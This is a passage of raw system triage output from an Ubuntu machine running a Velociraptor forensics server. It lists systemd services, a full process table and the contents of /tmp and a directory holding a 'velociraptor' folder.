Coldplug All udev Devices systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files systemd-update-utmp.service loaded active exited Record System Boot/Shutdown in UTMP systemd-user-sessions.service loaded active exited Permit User Sessions udisks2.service loaded active running Disk Manager ufw.service loaded active exited Uncomplicated firewall unattended-upgrades.service loaded active running Unattended Upgrades Shutdown upower.service loaded active running Daemon for power management [email protected] loaded active exited User Runtime Directory /run/user/1000 [email protected] loaded active running User Manager for UID 1000 velociraptor.service loaded active running Velociraprot linux amd64 wpa_supplicant.service loaded active running WPA supplicant

LOAD = Reflects whether the unit definition was properly loaded. ACTIVE = The high-level unit activation state, i.e. generalization of SUB. SUB = The low-level unit activation state, values depend on unit type. 63 loaded units listed. Pass --all to see loaded but inactive units, too. To show all installed unit files use 'systemctl list-unit-files'. --------------------------------- List Processes USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.2 167888 13008 ? Ss 11:08 0:07 /sbin/init splash root 2 0.0 0.0 0 0 ? S 11:08 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S 11:08 0:00 [pool_workqueue_release] root 4 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-rcu_g] root 5 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-rcu_p] root 6 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-slub_] root 7 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-netns] root 10 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/0:0H-events_highpri] root 12 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-mm_pe] root 13 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_kthread] root 14 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_rude_kthread] root 15 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_trace_kthread] root 16 0.0 0.0 0 0 ? S 11:08 0:00 [ksoftirqd/0] root 17 0.0 0.0 0 0 ? I 11:08 0:04 [rcu_preempt] root 18 0.0 0.0 0 0 ? S 11:08 0:00 [migration/0] root 19 0.0 0.0 0 0 ? S 11:08 0:00 [idle_inject/0] root 20 0.0 0.0 0 0 ? S 11:08 0:00 [cpuhp/0] root 21 0.0 0.0 0 0 ? S 11:08 0:00 [cpuhp/1] root 22 0.0 0.0 0 0 ? S 11:08 0:00 [idle_inject/1] root 23 0.0 0.0 0 0 ? S 11:08 0:00 [migration/1] root 24 0.0 0.0 0 0 ? S 11:08 0:00 [ksoftirqd/1] root 26 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/1:0H-events_highpri] root 29 0.0 0.0 0 0 ? S 11:08 0:00 [kdevtmpfs] root 30 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-inet_] root 31 0.6 0.0 0 0 ? S 11:08 3:21 [kauditd] root 32 0.0 0.0 0 0 ? S 11:08 0:00 [khungtaskd] root 33 0.0 0.0 0 0 ? S 11:08 0:00 [oom_reaper] root 35 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-write] root 36 0.0 0.0 0 0 ? S 11:08 0:04 [kcompactd0] root 38 0.0 0.0 0 0 ? SN 11:08 0:00 [ksmd] root 39 0.0 0.0 0 0 ? SN 11:08 0:00 [khugepaged] root 40 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kinte] root 41 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kbloc] root 42 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-blkcg] root 43 0.0 0.0 0 0 ? S 11:08 0:00 [irq/9-acpi] root 44 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-tpm_d] root 45 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ata_s] root 46 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-md] root 47 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-md_bi] root 48 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-edac-] root 49 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-devfr] root 50 0.0 0.0 0 0 ? S 11:08 0:00 [watchdogd] root 51 0.0 0.0 0 0 ? I< 11:08 0:11 [kworker/0:1H-kblockd] root 52 0.0 0.0 0 0 ? S 11:08 0:03 [kswapd0] root 53 0.0 0.0 0 0 ? S 11:08 0:00 [ecryptfs-kthread] root 55 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kthro] root 56 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-acpi_] root 57 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_0] root 58 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_] root 59 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_1] root 60 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_] root 61 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_2] root 62 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_] root 66 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-mld] root 67 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ipv6_] root 76 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kstrp] root 78 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u7:0] root 79 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u8:0] root 80 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u9:0] root 94 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-charg] root 113 0.0 0.0 0 0 ? I< 11:08 0:11 [kworker/1:1H-kblockd] root 146 0.0 0.0 0 0 ? I 11:08 0:12 [kworker/u4:1-ext4-rsv-conversion] root 181 0.1 0.0 0 0 ? S 11:08 0:38 [jbd2/sda3-8] root 182 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ext4-] root 221 0.1 5.3 469244 323656 ? S<s 11:09 0:50 /lib/systemd/systemd-journald root 253 0.0 0.1 26888 6992 ? Ss 11:09 0:00 /lib/systemd/systemd-udevd root 306 0.0 0.0 0 0 ? I< 11:09 0:00 [kworker/R-ttm] root 308 0.0 0.0 0 0 ? I< 11:09 0:00 [kworker/R-crypt] systemd+ 378 0.1 0.1 14836 6528 ? Ss 11:09 0:48 /lib/systemd/systemd-oomd systemd+ 381 0.0 0.2 26464 14192 ? Ss 11:09 0:01 /lib/systemd/systemd-resolved systemd+ 385 0.0 0.1 89388 7040 ? Ssl 11:09 0:00 /lib/systemd/systemd-timesyncd root 391 2.3 0.0 11872 2692 ? S<sl 11:09 12:34 /sbin/auditd root 424 0.0 0.0 0 0 ? S 11:09 0:00 [audit_prune_tree] root 487 0.0 0.1 239908 7608 ? Ssl 11:09 0:01 /usr/libexec/accounts-daemon root 488 0.0 0.0 2816 1920 ? Ss 11:09 0:00 /usr/sbin/acpid avahi 491 0.0 0.0 7632 3712 ? Ss 11:09 0:01 avahi-daemon: running [ubuntu-28.local] root 493 0.0 0.0 9496 2688 ? Ss 11:09 0:00 /usr/sbin/cron -f -P message+ 494 0.0 0.1 11120 6656 ? Ss 11:09 0:02 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only root 496 0.0 0.3 261108 18496 ? Ssl 11:09 0:03 /usr/sbin/NetworkManager --no-daemon root 502 0.0 0.0 82768 3712 ? Ssl 11:09 0:01 /usr/sbin/irqbalance --foreground root 506 0.0 0.3 41200 21248 ? Ss 11:09 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers root 508 0.0 0.1 243096 11152 ? Ssl 11:09 0:02 /usr/libexec/polkitd --no-debug root 509 0.0 0.1 240068 7040 ? Ssl 11:09 0:00 /usr/libexec/power-profiles-daemon syslog 511 0.0 0.0 222404 5248 ? Ssl 11:09 0:00 /usr/sbin/rsyslogd -n -iNONE root 515 0.0 0.6 1849620 39012 ? Ssl 11:09 0:05 /usr/lib/snapd/snapd root 517 0.0 0.1 236380 6400 ? Ssl 11:09 0:00 /usr/libexec/switcheroo-control root 522 0.0 0.1 15400 7672 ? Ss 11:09 0:00 /lib/systemd/systemd-logind root 525 0.0 0.2 393080 12376 ? Ssl 11:09 0:00 /usr/libexec/udisks2/udisksd root 528 0.0 0.1 16504 6144 ? Ss 11:09 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant avahi 551 0.0 0.0 7444 1408 ? S 11:09 0:00 avahi-daemon: chroot helper root 580 0.0 0.1 317972 11832 ? Ssl 11:09 0:00 /usr/sbin/ModemManager root 593 0.0 1.0 6166548 61752 ? Ssl 11:09 0:13 /usr/local/bin/velociraptor --config /root/server.config.yaml frontend -v root 614 0.0 0.3 118192 23168 ? Ssl 11:09 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal root 641 0.0 0.1 241344 9088 ? Ssl 11:09 0:00 /usr/sbin/gdm3 root 645 0.0 0.1 73028 12032 ? Ss 11:09 0:00 /usr/sbin/cupsd -l root 691 0.0 0.1 172068 10624 ? Ssl 11:09 0:00 /usr/sbin/cups-browsed kernoops 707 0.0 0.0 13092 2456 ? Ss 11:09 0:00 /usr/sbin/kerneloops --test kernoops 712 0.0 0.0 13092 2324 ? Ss 11:09 0:00 /usr/sbin/kerneloops root 721 0.2 1.4 6168788 90684 ? Sl 11:09 1:24 /usr/local/bin/velociraptor --config /root/server.config.yaml frontend -v rtkit 745 0.0 0.0 154004 3328 ? SNsl 11:09 0:00 /usr/libexec/rtkit-daemon root 968 0.0 0.1 242228 8448 ? Ssl 11:09 0:00 /usr/libexec/upowerd root 974 0.0 0.3 298380 18620 ? Ssl 11:09 0:00 /usr/libexec/packagekitd colord 1109 0.0 0.2 245376 12536 ? Ssl 11:09 0:00 /usr/libexec/colord root 1169 0.0 0.1 391920 11316 ? Sl 11:09 0:00 gdm-session-worker [pam/gdm-password] champus+ 1173 0.0 0.1 17984 10368 ? Ss 11:09 0:02 /lib/systemd/systemd --user champus+ 1174 0.0 0.0 169964 5340 ? S 11:09 0:00 (sd-pam) champus+ 1180 0.0 0.0 39568 4864 ? S<sl 11:09 0:00 /usr/bin/pipewire champus+ 1181 0.0 0.0 23456 4864 ? Ssl 11:09 0:00 /usr/bin/pipewire-media-session champus+ 1182 0.0 0.3 2132512 19172 ? S<sl 11:09 0:00 /usr/bin/pulseaudio --daemonize=no --log-target=journal champus+ 1193 0.0 0.1 240892 6812 ? Sl 11:09 0:00 /usr/bin/gnome-keyring-daemon --daemonize --login champus+ 1201 0.0 0.1 162432 6144 tty2 Ssl+ 11:09 0:00 /usr/libexec/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --session=ubuntu champus+ 1203 0.2 1.6 655052 99396 tty2 Sl+ 11:09 1:19 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -nolisten tcp -background none -noreset -keeptty -novtswitch -verbose 3 champus+ 1214 0.0 0.1 10320 6528 ? Ss 11:09 0:02 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only champus+ 1215 0.0 0.1 612836 7552 ? Ssl 11:09 0:00 /usr/libexec/xdg-document-portal champus+ 1218 0.0 0.1 236156 6272 ? Ssl 11:09 0:00 /usr/libexec/xdg-permission-store root 1224 0.0 0.0 2796 1792 ? Ss 11:09 0:00 fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/1000/doc champus+ 1252 0.0 0.2 223044 13440 tty2 Sl+ 11:09 0:00 /usr/libexec/gnome-session-binary --session=ubuntu champus+ 1341 0.0 0.1 309728 7936 ? Ssl 11:09 0:00 /usr/libexec/at-spi-bus-launcher champus+ 1347 0.0 0.0 8564 4480 ? S 11:09 0:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 11 --address=unix:path=/run/user/1000/at-spi/bus_1 champus+ 1390 0.0 0.0 91912 5120 ? Ssl 11:09 0:00 /usr/libexec/gnome-session-ctl --monitor champus+ 1406 0.0 0.1 240648 7808 ? Ssl 11:09 0:00 /usr/libexec/gvfsd champus+ 1418 0.0 0.1 380896 6656 ? Sl 11:09 0:00 /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f champus+ 1423 0.0 0.2 519128 15232 ? Ssl 11:09 0:00 /usr/libexec/gnome-session-binary --systemd-service --session=ubuntu champus+ 1468 1.4 5.0 4242500 305728 ? Ssl 11:09 7:26 /usr/bin/gnome-shell champus+ 1516 0.0 0.3 583040 19584 ? Sl 11:09 0:00 /usr/libexec/gnome-shell-calendar-server champus+ 1522 0.0 0.3 1072140 23296 ? Ssl 11:09 0:00 /usr/libexec/evolution-source-registry champus+ 1530 0.0 0.5 597216 35584 ? Sl 11:09 0:00 /usr/libexec/goa-daemon champus+ 1533 0.0 0.4 840468 27264 ? Ssl 11:09 0:00 /usr/libexec/evolution-calendar-factory champus+ 1542 0.0 0.2 338404 13696 ? Sl 11:09 0:00 /usr/libexec/goa-identity-service champus+ 1543 0.0 0.1 315892 10112 ? Ssl 11:09 0:00 /usr/libexec/gvfs-udisks2-volume-monitor champus+ 1553 0.0 0.1 315212 7680 ? Ssl 11:09 0:02 /usr/libexec/gvfs-afc-volume-monitor champus+ 1561 0.0 0.1 236460 6528 ? Ssl 11:09 0:00 /usr/libexec/gvfs-mtp-volume-monitor champus+ 1563 0.0 0.0 156940 5888 ? Ssl 11:09 0:00 /usr/libexec/dconf-service champus+ 1572 0.0 0.4 672364 26880 ? Ssl 11:09 0:00 /usr/libexec/evolution-addressbook-factory champus+ 1573 0.0 0.1 236636 6656 ? Ssl 11:09 0:00 /usr/libexec/gvfs-goa-volume-monitor champus+ 1577 0.0 0.1 237416 6912 ? Ssl 11:09 0:00 /usr/libexec/gvfs-gphoto2-volume-monitor champus+ 1594 0.0 0.1 314868 8832 ? Sl 11:09 0:00 /usr/libexec/gvfsd-trash --spawner :1.19 /org/gtk/gvfs/exec_spaw/0 champus+ 1603 0.0 0.4 2599500 26372 ? Sl 11:09 0:00 /usr/bin/gjs /usr/share/gnome-shell/org.gnome.Shell.Notifications champus+ 1606 0.0 0.1 162756 7808 ? Sl 11:09 0:00 /usr/libexec/at-spi2-registryd --use-gnome-session champus+ 1618 0.0 0.0 2892 1664 ? Ss 11:09 0:00 sh -c /usr/bin/ibus-daemon --panel disable $([ "$XDG_SESSION_TYPE" = "x11" ] && echo "--xim") champus+ 1619 0.0 0.1 310392 6656 ? Ssl 11:09 0:00 /usr/libexec/gsd-a11y-settings champus+ 1622 0.0 0.1 315500 11812 ? Sl 11:09 0:18 /usr/bin/ibus-daemon --panel disable --xim champus+ 1624 0.0 0.4 537204 25316 ? Ssl 11:09 0:00 /usr/libexec/gsd-color champus+ 1630 0.0 0.2 375436 13568 ? Ssl 11:09 0:00 /usr/libexec/gsd-datetime champus+ 1633 0.0 0.1 312080 7936 ? Ssl 11:09 0:01 /usr/libexec/gsd-housekeeping champus+ 1634 0.0 0.3 341424 22508 ? Ssl 11:09 0:00 /usr/libexec/gsd-keyboard champus+ 1638 0.0 0.4 717624 25796 ? Ssl 11:09 0:00 /usr/libexec/gsd-media-keys champus+ 1640 0.0 0.4 525040 24312 ? Ssl 11:09 0:00 /usr/libexec/gsd-power champus+ 1642 0.0 0.1 249872 10752 ? Ssl 11:09 0:00 /usr/libexec/gsd-print-notifications champus+ 1643 0.0 0.1 232272 7552 ? Sl 11:09 0:00 /usr/libexec/gsd-disk-utility-notify champus+ 1644 0.0 0.1 457856 6656 ? Ssl 11:09 0:00 /usr/libexec/gsd-rfkill champus+ 1646 0.0 0.1 236292 6272 ? Ssl 11:09 0:00 /usr/libexec/gsd-screensaver-proxy champus+ 1649 0.0 0.1 465780 9344 ? Ssl 11:09 0:00 /usr/libexec/gsd-sharing champus+ 1654 0.0 0.1 312272 7552 ? Ssl 11:09 0:00 /usr/libexec/gsd-smartcard champus+ 1657 0.0 0.9 762828 60304 ? Sl 11:09 0:00 /usr/libexec/evolution-data-server/evolution-alarm-notify champus+ 1661 0.0 0.1 319312 8704 ? Ssl 11:09 0:00 /usr/libexec/gsd-sound champus+ 1665 0.0 0.3 268020 22548 ? Ssl 11:09 0:00 /usr/libexec/gsd-wacom champus+ 1674 0.0 0.3 343292 23932 ? Ssl 11:09 0:00 /usr/libexec/gsd-xsettings champus+ 1693 0.0 0.1 237312 7296 ? Sl 11:09 0:00 /usr/libexec/ibus-dconf champus+ 1695 0.0 0.4 272488 28020 ? Sl 11:09 0:03 /usr/libexec/ibus-extension-gtk3 champus+ 1701 0.0 0.3 194160 22968 ? Sl 11:09 0:00 /usr/libexec/ibus-x11 --kill-daemon champus+ 1706 0.0 0.1 237264 7424 ? Sl 11:09 0:00 /usr/libexec/ibus-portal champus+ 1723 0.0 0.2 342364 14208 ? Sl 11:09 0:00 /usr/libexec/gsd-printer champus+ 1733 0.0 0.0 39136 4224 ? Ss 11:09 0:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration champus+ 1745 0.0 0.1 623772 11904 ? Ssl 11:09 0:01 /usr/libexec/xdg-desktop-portal champus+ 1765 0.0 1.2 1395884 73560 ? Ssl 11:09 0:02 /usr/libexec/xdg-desktop-portal-gnome champus+ 1851 0.0 0.4 2534008 26908 ? Sl 11:09 0:00 /usr/bin/gjs /usr/share/gnome-shell/org.gnome.ScreenSaver champus+ 1855 0.0 1.1 915040 71320 ? Sl 11:09 0:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration champus+ 1874 0.0 0.1 163612 7424 ? Sl 11:09 0:06 /usr/libexec/ibus-engine-simple champus+ 1875 0.0 0.5 719576 35448 ? SNsl 11:09 0:01 /usr/libexec/tracker-miner-fs-3 champus+ 1926 0.0 0.3 342028 22784 ? Ssl 11:09 0:00 /usr/libexec/xdg-desktop-portal-gtk champus+ 1962 0.0 0.1 163048 6400 ? Ssl 11:09 0:00 /usr/libexec/gvfsd-metadata champus+ 1997 0.0 0.5 537936 36096 ? Sl 11:10 0:02 update-notifier champus+ 3887 0.0 0.0 41316 2944 ? S 11:16 0:00 podman champus+ 9538 0.0 1.0 1203740 64236 ? Sl 11:40 0:05 /usr/bin/nautilus --gapplication-service champus+ 9568 3.6 14.3 12403380 870936 ? Sl 11:42 17:46 /snap/firefox/7177/usr/lib/firefox/firefox champus+ 9638 0.0 0.0 21072 2464 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/crashhelper 9568 9 /tmp/ 11 champus+ 9701 0.0 0.4 299784 27520 ? S 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -ipcHandle 0 -signalPipe 1 -initialChannelId {54ef713b-a611-4e84-9f06-df63f5debaf4} -parentPid 9568 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 1 forkserver champus+ 9704 0.0 0.5 314180 36268 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -prefsHandle 0:35969 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {232c0fd9-eff3-428d-9663-2763ef6a6ffb} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 2 socket champus+ 9732 1.7 3.1 2538744 188336 ? Sl 11:42 8:26 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:36141 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {2f719dbf-acd1-40e7-9c1f-45b26d269367} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 3 tab champus+ 9743 0.0 0.6 447228 41132 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -prefsHandle 0:36141 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {83a6878e-195a-47e0-aa3f-fe4a5dfe3b7b} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 4 rdd champus+ 9780 0.0 0.2 1765940 17792 ? Sl 11:42 0:01 /usr/bin/snap userd champus+ 9938 0.0 1.4 2465008 87996 ? Sl 11:42 0:01 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:45757 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {0e618765-94ab-4adb-96ee-e57c09db7d36} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 5 tab champus+ 10235 0.0 0.7 451848 47280 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -sandboxingKind 0 -prefsHandle 0:46927 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {4c7ee706-7853-4c03-b832-7098687275bf} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 6 utility champus+ 10244 1.2 11.7 3234416 715124 ? Sl 11:42 6:03 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43481 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {22da36fa-b041-4214-bca0-96970a908d65} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 7 tab champus+ 10451 0.2 1.3 2454436 83724 ? Sl 11:42 1:07 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43670 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {0846778f-6aeb-4339-8fc9-4ab5f998a29e} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 10 tab champus+ 10653 0.0 0.1 388688 8704 ? Sl 11:43 0:00 /usr/libexec/gvfsd-network --spawner :1.19 /org/gtk/gvfs/exec_spaw/1 champus+ 10667 0.0 0.1 316828 8576 ? Sl 11:43 0:00 /usr/libexec/gvfsd-dnssd --spawner :1.19 /org/gtk/gvfs/exec_spaw/3 champus+ 10741 0.0 1.0 2428568 65204 ? Sl 11:47 0:26 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {7824f062-f181-48fd-85a5-9646d4287f73} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 14 tab champus+ 10748 0.0 1.0 2428568 65296 ? Sl 11:47 0:26 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {31607e45-8b35-41da-9de7-799bfb0700ea} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 15 tab champus+ 10754 0.0 1.0 2428568 65088 ? Sl 11:47 0:26 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {3a17b899-5005-4e4a-82f2-292b77770c09} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 16 tab root 10934 0.0 0.0 0 0 ? I 11:50 0:03 [kworker/1:1-mm_percpu_wq] root 23306 0.0 0.0 0 0 ? I 16:23 0:00 [kworker/u4:2] root 24156 0.0 0.0 0 0 ? I 16:53 0:01 [kworker/0:1-events] root 24945 0.0 0.0 0 0 ? I 18:38 0:00 [kworker/u5:1-events_unbound] root 24992 0.0 0.0 0 0 ? I 18:45 0:00 [kworker/u6:3-events_unbound] root 25203 0.0 0.0 0 0 ? I 19:21 0:00 [kworker/u5:3-events_power_efficient] root 25287 0.0 0.0 0 0 ? I 19:35 0:00 [kworker/u6:1-flush-8:0] root 25465 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/0:2-events] root 25479 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/u6:2-flush-8:0] root 25485 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/u5:0-flush-8:0] root 25508 0.0 0.0 0 0 ? I 19:46 0:00 [kworker/1:2-cgroup_destroy] champus+ 25558 0.4 1.0 3057456 64080 ? Sl 19:48 0:01 gjs /usr/share/gnome-shell/extensions/[email protected]/ding.js -E -P /usr/share/gnome-shell/extensions/[email protected] -M 0 -D 0:0:1280:800:1:27:0:0:0:0 champus+ 25620 0.0 0.3 35940 19456 ? S 19:49 0:00 /usr/bin/python3 /usr/bin/gnome-terminal --wait champus+ 25621 0.0 0.4 307540 27904 ? Sl 19:49 0:00 /usr/bin/gnome-terminal.real --wait champus+ 25624 1.1 0.7 889108 48488 ? Ssl 19:49 0:03 /usr/libexec/gnome-terminal-server champus+ 25647 0.0 0.0 11268 5504 pts/0 Ss 19:49 0:00 bash root 25669 0.0 0.0 0 0 ? I 19:49 0:00 [kworker/0:0-events] root 25715 0.0 0.0 0 0 ? I 19:50 0:00 [kworker/u5:2-events_power_efficient] root 25716 0.0 0.0 0 0 ? I 19:50 0:00 [kworker/u6:0-writeback] root 25736 0.0 0.1 14348 6272 pts/0 S+ 19:51 0:00 sudo -i root 25737 0.0 0.0 14348 2512 pts/1 Ss 19:51 0:00 sudo -i root 25738 0.0 0.0 11396 5504 pts/1 S 19:51 0:00 -bash root 25780 0.0 0.0 11396 3804 pts/1 S+ 19:53 0:00 -bash root 25786 0.0 0.0 12672 3456 pts/1 R+ 19:53 0:00 ps aux --------------------------------- List files: total 68 drwxrwxrwt 17 root root 4096 Nov 6 19:48 . drwxr-xr-x 20 root root 4096 Aug 27 17:11 .. drwxrwxrwt 2 root root 4096 Nov 6 11:09 .font-unix -rw------- 1 champuser champuser 0 Nov 6 11:09 gdm3-config-err-4Hw2lH drwxrwxrwt 2 root root 4096 Nov 6 11:09 .ICE-unix drwx------ 4 root root 4096 Nov 6 11:42 snap-private-tmp drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-colord.service-hijiiC drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-ModemManager.service-pubDje drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-power-profiles-daemon.service-Msg1Aw drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-switcheroo-control.service-vc6JUV drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-logind.service-mRItdE drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-oomd.service-ZSLhw3 drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-resolved.service-qTOjod drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-timesyncd.service-d7gdD4 drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-upower.service-k0lchS drwxrwxrwt 2 root root 4096 Nov 6 11:09 .Test-unix drwxrwxrwt 2 root root 4096 Nov 6 11:09 .X11-unix drwxrwxrwt 2 root root 4096 Nov 6 11:09 .XIM-unix total 12 drwxr-xr-x 3 root root 4096 Nov 1 13:49 . drwxr-xr-x 20 root root 4096 Aug 27 17:11 .. drwx------ 16 root root 4096 Oct 4 16:23 velociraptor --------------------------------- List Update.custom UNIT LOAD ACTIVE SUB DESCRIPTION proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point 